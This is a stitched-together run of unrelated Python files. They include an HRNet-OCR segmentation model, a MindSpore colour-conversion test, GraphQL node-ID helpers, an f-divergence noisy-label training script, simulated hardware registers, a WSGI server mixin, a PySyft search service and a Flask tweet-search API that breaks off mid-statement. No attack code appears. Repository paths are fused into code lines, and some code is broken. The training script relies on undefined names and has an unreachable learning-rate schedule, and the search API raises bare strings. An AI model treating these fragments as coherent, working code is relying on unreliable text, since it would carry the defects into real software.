dropout=0.05) out = Conv2D(classes, 1, 1, padding='same', kernel_initializer='he_normal')(feats) if activation in {'softmax', 'sigmoid'}: out_aux = Activation(activation)(out_aux) out = Activation(activation)(out) return out_aux, out def seg_hrnet_ocr(batch_size, height, width, channel, classes, activation='softmax', hrnet_type='hrnet_w48'): if hrnet_type == 'hrnet_w18': size = [18, 36, 72, 144] elif hrnet_type == 'hrnet_w32': size = [32, 64, 128, 256] elif hrnet_type == 'hrnet_w48': size = [48, 96, 192, 384] else: raise ValueError("Unsupported hrnet type!") inputs = Input(batch_shape=(batch_size,) + (height, width, channel)) x = stem_net(inputs) x = transition_layer1(x, size[:2]) for i in range(1): x = make_branch1(x, size[:2]) x = fuse_layer1(x, size[:2]) x = transition_layer2(x, size[:3]) for i in range(4): x = make_branch2(x, size[:3]) x = fuse_layer2(x, size[:3]) x = transition_layer3(x, size) for i in range(3): x = make_branch3(x, size) x = fuse_layer3(x, size) out_aux, out = ocr_module(x, classes=classes, activation=activation) model = Model(inputs=inputs, outputs=(out, out_aux)) return model if __name__ == "__main__": from tensorflow.keras.utils import plot_model import os os.environ["PATH"] += os.pathsep + 'C:/Program Files/Graphviz 2.44.1/bin/' model1 = seg_hrnet_ocr(batch_size=2, height=512, width=512, channel=3, classes=19, hrnet_type='hrnet_w48') model1.summary() plot_model(model1, to_file='./seg_hrnet.png', show_shapes=True)httpsgithu/mindsporetests/ut/python/dataset/test_convertcolor.py # Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """ Testing ConvertColor op in DE """ import cv2 import mindspore.dataset as ds import mindspore.dataset.vision.transforms as c_vision import mindspore.dataset.vision.utils as mode from mindspore import log as logger from util import visualize_image, diff_mse DATA_DIR = ["../data/dataset/test_tf_file_3_images/train-0000-of-0001.data"] SCHEMA_DIR = "../data/dataset/test_tf_file_3_images/datasetSchema.json" IMAGE_FILE = "../data/dataset/apple.jpg" def convert_color(ms_convert, cv_convert, plot=False): """ ConvertColor with different mode. """ # First dataset dataset1 = ds.TFRecordDataset(DATA_DIR, SCHEMA_DIR, shuffle=False) decode_op = c_vision.Decode() convertcolor_op = c_vision.ConvertColor(ms_convert) dataset1 = dataset1.map(operations=decode_op, input_columns=["image"]) dataset1 = dataset1.map(operations=convertcolor_op, input_columns=["image"]) # Second dataset dataset2 = ds.TFRecordDataset(DATA_DIR, SCHEMA_DIR, columns_list=["image"], shuffle=False) dataset2 = dataset2.map(operations=decode_op, input_columns=["image"]) num_iter = 0 for data1, data2 in zip(dataset1.create_dict_iterator(num_epochs=1, output_numpy=True), dataset2.create_dict_iterator(num_epochs=1, output_numpy=True)): if num_iter > 0: break convertcolor_ms = data1["image"] original = data2["image"] convertcolor_cv = cv2.cvtColor(original, cv_convert) mse = diff_mse(convertcolor_ms, convertcolor_cv) logger.info("convertcolor_{}, mse: {}".format(num_iter + 1, mse)) assert mse == 0 num_iter += 1 if plot: visualize_image(original, convertcolor_ms, mse, convertcolor_cv) def test_convertcolor_pipeline(plot=False): """ Test ConvertColor of transforms """ logger.info("test_convertcolor_pipeline") convert_color(mode.ConvertMode.COLOR_BGR2GRAY, cv2.COLOR_BGR2GRAY, plot) convert_color(mode.ConvertMode.COLOR_BGR2RGB, cv2.COLOR_BGR2RGB, plot) convert_color(mode.ConvertMode.COLOR_BGR2BGRA, cv2.COLOR_BGR2BGRA, plot) def test_convertcolor_eager(): """ Test ConvertColor with eager mode """ logger.info("test_convertcolor") img = cv2.imread(IMAGE_FILE) img_ms = c_vision.ConvertColor(mode.ConvertMode.COLOR_BGR2GRAY)(img) img_expect = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) mse = diff_mse(img_ms, img_expect) assert mse == 0 if __name__ == "__main__": test_convertcolor_pipeline(plot=False) test_convertcolor_eager() from __future__ import annotations import json import typing from nebulo.gql.alias import Field, InterfaceType, NonNull, ScalarType from nebulo.sql.inspect import get_primary_key_columns, get_table_name from nebulo.sql.statement_helpers import literal_string from nebulo.text_utils.base64 import from_base64, to_base64 from sqlalchemy import func from sqlalchemy.sql.selectable import Alias class NodeIdStructure(typing.NamedTuple): table_name: str values: typing.Dict[str, typing.Any] @classmethod def from_dict(cls, contents: typing.Dict) -> NodeIdStructure: res = cls(table_name=contents["table_name"], values=contents["values"]) return res def to_dict(self) -> typing.Dict[str, typing.Any]: return {"table_name": self.table_name, "values": self.values} def serialize(self) -> str: ser = to_base64(json.dumps(self.to_dict())) return ser @classmethod def deserialize(cls, serialized: str) -> NodeIdStructure: contents = json.loads(from_base64(serialized)) return cls.from_dict(contents) def serialize(value: typing.Union[NodeIdStructure, typing.Dict]): node_id = NodeIdStructure.from_dict(value) if isinstance(value, dict) else value return node_id.serialize() def to_node_id_sql(sqla_model, query_elem: Alias): table_name = get_table_name(sqla_model) pkey_cols = get_primary_key_columns(sqla_model) # Columns selected from query element vals = [] for col in pkey_cols: col_name = str(col.name) vals.extend([literal_string(col_name), query_elem.c[col_name]]) return func.jsonb_build_object( literal_string("table_name"), literal_string(table_name), literal_string("values"), func.jsonb_build_object(*vals), ) ID = ScalarType( "ID", description="Unique ID for node", serialize=serialize, parse_value=NodeIdStructure.deserialize, parse_literal=lambda x: NodeIdStructure.deserialize(x.value), ) NodeInterface = InterfaceType( "NodeInterface", description="An object with a nodeId", fields={"nodeId": Field(NonNull(ID), description="The global id of the object.", resolve=None)}, # Maybe not necessary resolve_type=lambda *args, **kwargs: None, ) #bool ''' a or not b and c == (a or ((not b) and c)) ''' ans = input("What flavor do you want [vanilla]:") if ans != "": flavor = ans else: flavor = "vanilla" if ans: flavor = ans else: flavor = "vanilla" flavor = ans or "vanilla" flavor = input("What flavor do you want [vanilla]:") or "vanilla"weijiaheng/Robust-f-divergence-measures # Import libraries import numpy as np import os import csv import math import torch.nn.parallel import pickle import argparse from tqdm import tqdm from noise_data_mnist import * import torch import torch.nn as nn import torch.optim import torch.utils.data import torchvision import torch.nn as nn import torch.nn.functional as F from torch.nn import init from torch.autograd import Variable torch.autograd.set_detect_anomaly(True) num_classes = 10 num_epochs = 150 CUDA = True if torch.cuda.is_available() else False Tensor = torch.cuda.FloatTensor if CUDA else torch.FloatTensor CE = nn.CrossEntropyLoss().cuda() opt = parser.parse_args() # Stable version of CE Loss class CrossEntropyLossStable(nn.Module): def __init__(self, reduction='mean', eps=1e-5): super(CrossEntropyLossStable, self).__init__() self._name = "Stable Cross Entropy Loss" self._eps = eps self._softmax = nn.Softmax(dim=-1) self._nllloss = nn.NLLLoss(reduction=reduction) def forward(self, outputs, labels): return self._nllloss( torch.log( self._softmax(outputs) + self._eps ), labels ) criterion = CrossEntropyLossStable() criterion.cuda() # Divergence functions: div = opt.divergence if div == 'KL': def activation(x): return -torch.mean(x) def conjugate(x): return -torch.mean(torch.exp(x - 1.)) elif div == 'Reverse-KL': def activation(x): return -torch.mean(-torch.exp(x)) def conjugate(x): return -torch.mean(-1. - x) # remove log elif div == 'Jeffrey': def activation(x): return -torch.mean(x) def conjugate(x): return -torch.mean(x + torch.mul(x, x) / 4. + torch.mul(torch.mul(x, x), x) / 16.) elif div == 'Squared-Hellinger': def activation(x): return -torch.mean(1. - torch.exp(x)) def conjugate(x): return -torch.mean((1. - torch.exp(x)) / (torch.exp(x))) elif div == 'Pearson': def activation(x): return -torch.mean(x) def conjugate(x): return -torch.mean(torch.mul(x, x) / 4. + x) elif div == 'Neyman': def activation(x): return -torch.mean(1. - torch.exp(x)) def conjugate(x): return -torch.mean(2. - 2. * torch.sqrt(1. - x)) elif div == 'Jenson-Shannon': def activation(x): return -torch.mean(- torch.log(1. + torch.exp(-x))) - torch.log(torch.tensor(2.)) def conjugate(x): return -torch.mean(x + torch.log(1. + torch.exp(-x))) + torch.log(torch.tensor(2.)) elif div == 'Total-Variation': def activation(x): return -torch.mean(torch.tanh(x) / 2.) def conjugate(x): return -torch.mean(torch.tanh(x) / 2.) else: raise NotImplementedError("[-] Not Implemented f-divergence %s" % div) # Stable PROB: returns the negative predicted probability of an image given a reference label class ProbLossStable(nn.Module): def __init__(self, reduction='none', eps=1e-5): super(ProbLossStable, self).__init__() self._name = "Prob Loss" self._eps = eps self._softmax = nn.Softmax(dim=-1) self._nllloss = nn.NLLLoss(reduction='none') def forward(self, outputs, labels): return self._nllloss( self._softmax(outputs), labels ) criterion_prob = ProbLossStable() criterion_prob.cuda() # Training def train(train_loader, peer_loader, model, optimizer, epoch): model.train() peer_iter = iter(peer_loader) for i, (idx, input, target) in enumerate(train_loader): if idx.size(0) != batch_size: continue warmup_epoch = args.warmup input = torch.autograd.Variable(input.cuda()) target = torch.autograd.Variable(target.cuda()) output = model(input) optimizer.zero_grad() # After warm-up epochs, switch to optimizing f-divergence functions if epoch >= warmup_epoch: # Estimate E_Z [g(Z)] where Z follows the joint distribution of h, noisy Y; # g is the activation function prob_reg = -criterion_prob(output, target) loss_regular = activation(prob_reg) # Bias correction of uniform noise case for the activation term for k in range(10): target_tmp = target * 0. + k if k == 9: loss_regular -= transition_matrix[0][9] * activation(-criterion_prob(output, target_tmp.long())) else: loss_regular -= transition_matrix[k + 1][k] * activation(-criterion_prob(output, target_tmp.long())) #Estimate E_Z [f^*(g(Z))] where Z follows the product of marginal distributions of h, noisy Y; # f^*(g) is the conjugate function; input1 = peer_iter.next()[1] input1 = torch.autograd.Variable(input1.cuda()) output1 = model(input1) target2 = torch.randint(0, 10, (target.shape)).cuda() prob_peer = -criterion_prob(output1, target2) loss_peer = conjugate(prob_peer) # Bias correction of uniform noise case for the conjugate term for k in range(10): target_tmp = target2 * 0. + k if k == 9: loss_peer -= transition_matrix[0][9] * conjugate(-criterion_prob(output1, target_tmp.long())) else: loss_peer -= transition_matrix[k + 1][k] * conjugate(-criterion_prob(output1, target_tmp.long())) loss = loss_regular - loss_peer # Use CE loss for the warm-up. else: loss = criterion(output, target) loss.cuda() loss.backward() optimizer.step() # Calculate accuracy def test(model, test_loader): model.eval() correct = 0 total = 0 for i, (idx, input, target) in enumerate(test_loader): input = torch.Tensor(input).cuda() target = torch.autograd.Variable(target).cuda() total += target.size(0) output = model(input) _, predicted = torch.max(output.detach(), 1) correct += predicted.eq(target).sum().item() accuracy = 100. * correct / total return accuracy # Calculate f-divergence value in the max game def f_calculate(model, data_loader, peer_loader): model.eval() f_score = 0 peer_iter = iter(peer_loader) for i, (idx, input, target) in enumerate(data_loader): if idx.size(0) != batch_size: continue input = torch.autograd.Variable(input.cuda()) target = torch.autograd.Variable(target.cuda()) output = model(input) prob_reg = -criterion_prob(output.detach(), target) loss_regular = activation(prob_reg) for k in range(10): target_tmp = target * 0. + k if k == 9: loss_regular -= transition_matrix[0][9] * activation(-criterion_prob(output.detach(), target_tmp.long())) else: loss_regular -= transition_matrix[k + 1][k] * activation(-criterion_prob(output.detach(), target_tmp.long())) input1 = peer_iter.next()[1] input1 = torch.autograd.Variable(input1.cuda()) output1 = model(input1) target2 = torch.randint(0, 10, (target.shape)).cuda() prob_peer = -criterion_prob(output1.detach(), target2) loss_peer = conjugate(prob_peer) for k in range(10): target_tmp = target2 * 0. + k if k == 9: loss_peer -= transition_matrix[0][9] * conjugate(-criterion_prob(output1.detach(), target_tmp.long())) else: loss_peer -= transition_matrix[k + 1][k] * conjugate(-criterion_prob(output1.detach(), target_tmp.long())) score = loss_peer - loss_regular f_score += score * target.size(0) return f_score/10000 def main(writer): model_prob = CNNModel().cuda() best_prob_acc = 0 max_f = -100 val_acc_noisy_result = [] train_acc_result = [] test_acc_result = [] f_result = [] f_test_result = [] # Dataloader for peer samples, which is used for the estimation of the marginal distribution peer_train = peer_data_train(batch_size=args.batchsize, img_size=(32, 32)) peer_val = peer_data_val(batch_size=args.batchsize, img_size=(32, 32)) peer_test = peer_data_test(batch_size=args.batchsize, img_size=(32, 32)) for epoch in range(num_epochs): print("epoch=", epoch,'r=', args.r) learning_rate = 1e-3 if epoch > 20: learning_rate = 5e-4 elif epoch > 40: learning_rate = 1e-4 elif epoch > 60: learning_rate = 5e-5 elif epoch > 80: learning_rate = 1e-5 elif epoch > 100: learning_rate = 5e-6 elif epoch > 120: learning_rate = 1e-6 elif epoch > 140: learning_rate = 5e-7 optimizer_prob = torch.optim.Adam(model_prob.parameters(), lr=learning_rate) train(train_loader=train_loader_noisy, peer_loader = peer_train, model=model_prob, optimizer=optimizer_prob, epoch=epoch) print("validating model_prob...") # Training acc is calculated via noisy training data train_acc = test(model=model_prob, test_loader=train_loader_noisy) train_acc_result.append(train_acc) print('train_acc=', train_acc) # Validation acc is calculated via noisy validation data valid_acc = test(model=model_prob, test_loader=valid_loader_noisy) val_acc_noisy_result.append(valid_acc) print('valid_acc_noise=', valid_acc) # Calculate test accuracy test_acc = test(model=model_prob, test_loader=test_loader_) test_acc_result.append(test_acc) print('test_acc=', test_acc) f_div_value = f_calculate(model_prob, valid_loader_noisy, peer_val) f_result.append(f_div_value) print('f_div_value=', f_div_value) f_test = f_calculate(model_prob, test_loader_, peer_test) f_test_result.append(f_test) print('f_test_value=', f_test) # Best model is selected by referring to f-div value; the larger, the better! if f_div_value >= max_f: max_f = f_div_value torch.save(model_prob, './trained_models/BIAS_UNIFORM' + str(args.r) + '_' + str(args.s) + '_' + str(args.divergence) + '_' + str(args.warmup)) print("saved, f-div value increases.") writer.writerow([epoch, train_acc, valid_acc, test_acc, f_div_value, f_test]) def evaluate(path): model = torch.load(path) test_acc = test(model=model, test_loader=test_loader_) print('test_acc=', test_acc) if __name__ == '__main__': # Save statistics print("Begin:") writer1 = csv.writer(open(f'BIAS_UNIFORM_result_{r}_{div}_{args.warmup}.csv','w')) writer1.writerow(['Epoch', 'Training Acc', f'Val_Noisy_Acc', 'Test_ACC', 'f_div', 'f_test']) main(writer1) evaluate('./trained_models/BIAS_UNIFORM' + str(args.r) + '_' + str(args.s) + '_' + str(args.divergence) + '_' + str(args.warmup)) print("Traning finished") leveltwo/maze/base/__init__.py from .maze import Maze from .base import Viewport from .playable import MazePlayable from .editable import MazeEditable """ The following classes are defined: Register4 Register8 Register16 """ from .. import wire from .. import signal from . import FLOP Wire = wire.Wire Bus4 = wire.Bus4 Bus8 = wire.Bus8 Bus16 = wire.Bus16 class Register4: """Construct a new 4-bit storage register. Args: data_bus: An object of type Bus4. The data input to the register. enable: An object of type Wire. Enables the register. clock: An object of type Wire or Clock. The clock input to the register. output_bus: An object of type Bus4. The output of the register. Takes on the value of data_bus on the positive edges of clock if the value of enable is 1. Raises: TypeError: If either data_bus or output_bus is not a bus of width 4. """ def __init__(self, data_bus, enable, clock, output_bus): if len(data_bus) != 4: raise TypeError( "Expected bus of width 4, received bus of width {0}.".format( len(data_bus) ) ) if len(output_bus) != 4: raise TypeError( "Expected bus of width 4, received bus of width {0}.".format( len(output_bus) ) ) not_1 = Wire() not_2 = Wire() not_3 = Wire() not_4 = Wire() mux_bus = Bus4() _Multiplexer2To1_4(enable, data_bus, output_bus, mux_bus) FLOP.DFlipFlop(mux_bus[0], clock, output_bus[0], not_1) FLOP.DFlipFlop(mux_bus[1], clock, output_bus[1], not_2) FLOP.DFlipFlop(mux_bus[2], clock, output_bus[2], not_3) FLOP.DFlipFlop(mux_bus[3], clock, output_bus[3], not_4) self.data_bus = data_bus self.enable = enable self.clock = clock self.output_bus = output_bus def __str__(self): str_ = "" str_ += "data_bus: " + self.data_bus.__str__() + "\n" str_ += "enable: " + str(self.enable.value) + "\n" str_ += "clock: " + str(self.clock.value) + "\n" str_ += "output_bus: " + self.output_bus.__str__() return str_ def __call__( self, *, data_bus=None, enable=None, clock=None, output_bus=None ): if data_bus is not None: self.data_bus.wire_values = data_bus if enable is not None: self.enable.value = enable if clock is not None: self.clock.value = clock if output_bus is not None: self.output_bus.wire_values = output_bus class Register8: """Construct a new 8-bit storage register. Args: data_bus: An object of type Bus8. The data input to the register. enable: An object of type Wire. Enables the register. clock: An object of type Wire or Clock. The clock input to the register. output_bus: An object of type Bus8. The output of the register. Takes on the value of data_bus on the positive edges of clock if the value of enable is 1. Raises: TypeError: If either data_bus or output_bus is not a bus of width 8. """ def __init__(self, data_bus, enable, clock, output_bus): if len(data_bus) != 8: raise TypeError( "Expected bus of width 8, received bus of width {0}.".format( len(data_bus) ) ) if len(output_bus) != 8: raise TypeError( "Expected bus of width 8, received bus of width {0}.".format( len(output_bus) ) ) not_1 = Wire() not_2 = Wire() not_3 = Wire() not_4 = Wire() not_5 = Wire() not_6 = Wire() not_7 = Wire() not_8 = Wire() mux_bus = Bus8() _Multiplexer2To1_8(enable, data_bus, output_bus, mux_bus) FLOP.DFlipFlop(mux_bus[0], clock, output_bus[0], not_1) FLOP.DFlipFlop(mux_bus[1], clock, output_bus[1], not_2) FLOP.DFlipFlop(mux_bus[2], clock, output_bus[2], not_3) FLOP.DFlipFlop(mux_bus[3], clock, output_bus[3], not_4) FLOP.DFlipFlop(mux_bus[4], clock, output_bus[4], not_5) FLOP.DFlipFlop(mux_bus[5], clock, output_bus[5], not_6) FLOP.DFlipFlop(mux_bus[6], clock, output_bus[6], not_7) FLOP.DFlipFlop(mux_bus[7], clock, output_bus[7], not_8) self.data_bus = data_bus self.enable = enable self.clock = clock self.output_bus = output_bus def __str__(self): str_ = "" str_ += "data_bus: " + self.data_bus.__str__() + "\n" str_ += "enable: " + str(self.enable.value) + "\n" str_ += "clock: " + str(self.clock.value) + "\n" str_ += "output_bus: " + self.output_bus.__str__() return str_ def __call__( self, *, data_bus=None, enable=None, clock=None, output_bus=None ): if data_bus is not None: self.data_bus.wire_values = data_bus if enable is not None: self.enable.value = enable if clock is not None: self.clock.value = clock if output_bus is not None: self.output_bus.wire_values = output_bus class Register16: """Construct a new 16-bit storage register. Args: data_bus: An object of type Bus16. The data input to the register. enable: An object of type Wire. Enables the register. clock: An object of type Wire or Clock. The clock input to the register. output_bus: An object of type Bus16. The output of the register. Takes on the value of data_bus on the positive edges of clock if the value of enable is 1. Raises: TypeError: If either data_bus or output_bus is not a bus of width 16. """ def __init__(self, data_bus, enable, clock, output_bus): if len(data_bus) != 16: raise TypeError( "Expected bus of width 16, received bus of width {0}.".format( len(data_bus) ) ) if len(output_bus) != 16: raise TypeError( "Expected bus of width 16, received bus of width {0}.".format( len(output_bus) ) ) not_1 = Wire() not_2 = Wire() not_3 = Wire() not_4 = Wire() not_5 = Wire() not_6 = Wire() not_7 = Wire() not_8 = Wire() not_9 = Wire() not_10 = Wire() not_11 = Wire() not_12 = Wire() not_13 = Wire() not_14 = Wire() not_15 = Wire() not_16 = Wire() mux_bus = Bus16() _Multiplexer2To1_16(enable, data_bus, output_bus, mux_bus) FLOP.DFlipFlop(mux_bus[0], clock, output_bus[0], not_1) FLOP.DFlipFlop(mux_bus[1], clock, output_bus[1], not_2) FLOP.DFlipFlop(mux_bus[2], clock, output_bus[2], not_3) FLOP.DFlipFlop(mux_bus[3], clock, output_bus[3], not_4) FLOP.DFlipFlop(mux_bus[4], clock, output_bus[4], not_5) FLOP.DFlipFlop(mux_bus[5], clock, output_bus[5], not_6) FLOP.DFlipFlop(mux_bus[6], clock, output_bus[6], not_7) FLOP.DFlipFlop(mux_bus[7], clock, output_bus[7], not_8) FLOP.DFlipFlop(mux_bus[8], clock, output_bus[8], not_9) FLOP.DFlipFlop(mux_bus[9], clock, output_bus[9], not_10) FLOP.DFlipFlop(mux_bus[10], clock, output_bus[10], not_11) FLOP.DFlipFlop(mux_bus[11], clock, output_bus[11], not_12) FLOP.DFlipFlop(mux_bus[12], clock, output_bus[12], not_13) FLOP.DFlipFlop(mux_bus[13], clock, output_bus[13], not_14) FLOP.DFlipFlop(mux_bus[14], clock, output_bus[14], not_15) FLOP.DFlipFlop(mux_bus[15], clock, output_bus[15], not_16) self.data_bus = data_bus self.enable = enable self.clock = clock self.output_bus = output_bus def __str__(self): str_ = "" str_ += "data_bus: " + self.data_bus.__str__() + "\n" str_ += "enable: " + str(self.enable.value) + "\n" str_ += "clock: " + str(self.clock.value) + "\n" str_ += "output_bus: " + self.output_bus.__str__() return str_ def __call__( self, *, data_bus=None, enable=None, clock=None, output_bus=None ): if data_bus is not None: self.data_bus.wire_values = data_bus if enable is not None: self.enable.value = enable if clock is not None: self.clock.value = clock if output_bus is not None: self.output_bus.wire_values = output_bus class _Multiplexer2To1_4: """ This is an internal module for Register4. It multiplexes two 4-bit inputs to a single 4-bit output. """ def __init__( self, select, input_1_bus, input_2_bus, output_bus ): vcc = Wire() vcc.value = 1 signal.Multiplexer2To1( vcc, select, input_1_bus[0], input_2_bus[0], output_bus[0] ) signal.Multiplexer2To1( vcc, select, input_1_bus[1], input_2_bus[1], output_bus[1] ) signal.Multiplexer2To1( vcc, select, input_1_bus[2], input_2_bus[2], output_bus[2] ) signal.Multiplexer2To1( vcc, select, input_1_bus[3], input_2_bus[3], output_bus[3] ) class _Multiplexer2To1_8: """ This is an internal module for Register8. It multiplexes two 8-bit inputs to a single 8-bit output. """ def __init__( self, select, input_1_bus, input_2_bus, output_bus ): vcc = Wire() vcc.value = 1 signal.Multiplexer2To1( vcc, select, input_1_bus[0], input_2_bus[0], output_bus[0] ) signal.Multiplexer2To1( vcc, select, input_1_bus[1], input_2_bus[1], output_bus[1] ) signal.Multiplexer2To1( vcc, select, input_1_bus[2], input_2_bus[2], output_bus[2] ) signal.Multiplexer2To1( vcc, select, input_1_bus[3], input_2_bus[3], output_bus[3] ) signal.Multiplexer2To1( vcc, select, input_1_bus[4], input_2_bus[4], output_bus[4] ) signal.Multiplexer2To1( vcc, select, input_1_bus[5], input_2_bus[5], output_bus[5] ) signal.Multiplexer2To1( vcc, select, input_1_bus[6], input_2_bus[6], output_bus[6] ) signal.Multiplexer2To1( vcc, select, input_1_bus[7], input_2_bus[7], output_bus[7] ) class _Multiplexer2To1_16: """ This is an internal module for Register16. It multiplexes two 16-bit inputs to a single 16-bit output. """ def __init__( self, select, input_1_bus, input_2_bus, output_bus ): vcc = Wire() vcc.value = 1 signal.Multiplexer2To1( vcc, select, input_1_bus[0], input_2_bus[0], output_bus[0] ) signal.Multiplexer2To1( vcc, select, input_1_bus[1], input_2_bus[1], output_bus[1] ) signal.Multiplexer2To1( vcc, select, input_1_bus[2], input_2_bus[2], output_bus[2] ) signal.Multiplexer2To1( vcc, select, input_1_bus[3], input_2_bus[3], output_bus[3] ) signal.Multiplexer2To1( vcc, select, input_1_bus[4], input_2_bus[4], output_bus[4] ) signal.Multiplexer2To1( vcc, select, input_1_bus[5], input_2_bus[5], output_bus[5] ) signal.Multiplexer2To1( vcc, select, input_1_bus[6], input_2_bus[6], output_bus[6] ) signal.Multiplexer2To1( vcc, select, input_1_bus[7], input_2_bus[7], output_bus[7] ) signal.Multiplexer2To1( vcc, select, input_1_bus[8], input_2_bus[8], output_bus[8] ) signal.Multiplexer2To1( vcc, select, input_1_bus[9], input_2_bus[9], output_bus[9] ) signal.Multiplexer2To1( vcc, select, input_1_bus[10], input_2_bus[10], output_bus[10] ) signal.Multiplexer2To1( vcc, select, input_1_bus[11], input_2_bus[11], output_bus[11] ) signal.Multiplexer2To1( vcc, select, input_1_bus[12], input_2_bus[12], output_bus[12] ) signal.Multiplexer2To1( vcc, select, input_1_bus[13], input_2_bus[13], output_bus[13] ) signal.Multiplexer2To1( vcc, select, input_1_bus[14], input_2_bus[14], output_bus[14] ) signal.Multiplexer2To1( vcc, select, input_1_bus[15], input_2_bus[15], output_bus[15] ) andreyfedoseev/LearningRegistry10-100 from Server import ThreadedServer, ForkingServer import traceback class WSGIMixIn: def handle(self, req): environ = req.environ environ['wsgi.input'] = req.stdin environ['wsgi.errors'] = req.stderr environ.update(self._environ) if environ.get('HTTPS','off') in ('on','1'): environ['wsgi.url_scheme'] = 'https' else: environ['wsgi.url_scheme'] = 'http' headers_set = [] headers_sent = [] def write(data): if not headers_set: raise AssertionError("write() before start_response()") elif not headers_sent: # Before the first output, send the stored headers status, response_headers = headers_sent[:] = headers_set req.stdout.write('Status: %s\r\n' % status) for header in response_headers: req.stdout.write('%s: %s\r\n' % header) req.stdout.write('\r\n') req.stdout.write(data) req.stdout.flush() def start_response(status, response_headers, exc_info=None): if exc_info: try: if headers_sent: # Re-raise original exception if headers sent raise exc_info[0], exc_info[1], exc_info[2] finally: exc_info = None # avoid dangling circular ref elif headers_set: raise AssertionError("Headers already set!") headers_set[:] = [status,response_headers] return write result = self._app(environ, start_response) try: for data in result: if data: # don't send headers until body appears write(data) if not headers_sent: write('') # send headers now if body was empty finally: if hasattr(result,'close'): result.close() def error(self, req, e): traceback.print_exc(file=req.stderr) req.stderr.flush() class ThreadedWSGIServer(WSGIMixIn, ThreadedServer): _environ = { 'wsgi.version': (1,0), 'wsgi.multithread': True, 'wsgi.multiprocess': True, 'wsgi.run_once': False } def __init__(self, app, workers=5): ThreadedServer.__init__(self, workers) self._app = app class ForkingWSGIServer(WSGIMixIn, ForkingServer): _environ = { 'wsgi.version': (1,0), 'wsgi.multithread': False, 'wsgi.multiprocess': True, 'wsgi.run_once': False } def __init__(self, app, workers=5): ForkingServer.__init__(self, workers) self._app = app # stdlib import secrets from typing import List from typing import Type from typing import Union from datetime import datetime # third party from nacl.signing import VerifyKey from nacl.encoding import HexEncoder from nacl.signing import SigningKey # syft relative from syft.core.node.abstract.node import AbstractNode from syft.core.node.common.service.auth import service_auth from syft.core.node.common.service.node_service import ImmediateNodeServiceWithReply from syft.core.common.message import ImmediateSyftMessageWithReply from syft.grid.messages.network_search_message import ( NetworkSearchMessage, NetworkSearchResponse, ) from ..exceptions import ( MissingRequestKeyError, InvalidParameterValueError, AuthorizationError, ) from ..database.utils import model_to_json from syft.grid.client.client import connect from syft.grid.client.grid_connection import GridHTTPConnection from syft.core.node.domain.client import DomainClient import requests import json class BroadcastSearchService(ImmediateNodeServiceWithReply): @staticmethod @service_auth(guests_welcome=True) def process( node: AbstractNode, msg: NetworkSearchMessage, verify_key: VerifyKey, ) -> NetworkSearchResponse: queries = set(msg.content.get("query", [])) associations = node.association_requests.associations() def filter_domains(url): datasets = json.loads(requests.get(url + "/data-centric/tensors").text) for dataset in datasets["tensors"]: if queries.issubset(set(dataset["tags"])): return True return False filtered_nodes = list(filter(lambda x: filter_domains(x.address), associations)) match_nodes = [node.address for node in filtered_nodes] return NetworkSearchResponse( address=msg.reply_to, status_code=200, content={"match-nodes": match_nodes} ) @staticmethod def message_handler_types() -> List[Type[ImmediateSyftMessageWithReply]]: return [NetworkSearchMessage] backend/app.py #!/usr/bin/env python3 import database import pymongo import os import datetime import json import dateparser from flask import Flask, make_response from flask_cors import CORS from flask_restful import Resource, Api, reqparse app = Flask(__name__) api = Api(app) db = database.get_client()["twitter"] CORS(app) @api.representation("application/json") def output_json(data, code, headers=None): def _clean(o): if isinstance(o, list): return [_clean(item) for item in o] if isinstance(o, dict): return {k: _clean(v) for k, v in o.items()} if isinstance(o, datetime.datetime): return o.__str__() return o resp = make_response(json.dumps(_clean(data)), code) resp.headers.extend(headers or {}) return resp class SearchResource(Resource): def get(self): parser = reqparse.RequestParser() # PARSE ARGUMENTS # Page parser.add_argument("page", type=int, help="Page to display") # Archives parser.add_argument( "archive", type=str, action="append", help="Archive to include" ) # Languages parser.add_argument( "language", type=str, action="append", help="Language to include" ) # Content parser.add_argument("query", type=str, help="Text search query") # Date parser.add_argument( "min_time", type=dateparser.parse, help="Minimum publishing date" ) parser.add_argument( "max_time", type=dateparser.parse, help="Maximum publishing date" ) # Likes parser.add_argument("min_likes", type=int, help="Minimum likes") parser.add_argument("max_likes", type=int, help="Maximum likes") # Followers parser.add_argument("min_followers", type=int, help="Minimum followers") parser.add_argument("max_followers", type=int, help="Maximum followers") # Retweets parser.add_argument("min_retweets", type=int, help="Minimum retweets") parser.add_argument("max_retweets", type=int, help="Maximum retweets") # Hashtags parser.add_argument( "hashtag", type=str, action="append", help="Hashtag to include" ) # Account parser.add_argument( "account", type=str, action="append", help="Account to include" ) # Sorts (likes, retweets, quotes, followers, time published) def sort_field(s): if s[0:4] not in ["asc_", "dec_"]: raise "sort must start with + or -" if s[4:] not in [ "like_count", "retweet_count", "quote_count", "follower_count", "tweet_time", ]: raise "invalid sort field" return ( s[4:], pymongo.ASCENDING if s[0:4] == "asc_" else pymongo.DESCENDING, ) parser.add_argument( "sort", type=sort_field, help="Sort field (starts with asc_ or dec_)", default="dec_like_count", ) args = parser.parse_args() # PERFORM SEARCH params = {} if args["archive"] != None: params["_archive"] = {"$in": args["archive"]} if args["language"] != None: params["tweet_language"] = {"$in": args["language"]} if args["query"] != None: params["$text"] = {"$search": args["query"]} time_range = {} if args["min_time"] != None: time_range["$gte"] = args["min_time"] if args["max_time"] != None: time_range["$lte"] = args["max_time"] if time_range != {}: params["tweet_time"] = time_range like_range = {} if args["min_likes"] != None: like_range["$gte"] = args["min_likes"] if args["max_likes"] != None: like_range["$lte"] = args["max_likes"] if like_range != {}: params["like_count"] = like_range follower_range = {} if args["min_followers"] != None: follower_range["$gte"] = args["min_followers"] if args["max_followers"] != None: follower_range["$lte"] = args["max_followers"] if follower_range != {}: params["follower_count"] = follower_range retweet_range = {} if args["min_retweets"] != None: retweet_range["$gte"] = args["min_retweets"] if args["max_retweets"] != None: retweet_range["$lte"] = args["max_retweets"] if retweet_range != {}: params["retweet_count"] = retweet_range if args["hashtag"] != None: params["hashtags"] = {"$elemMatch": {"$in": args["hashtag"]}} if args["account"] != None: params["userid"] = {"$in": args["account"]} if 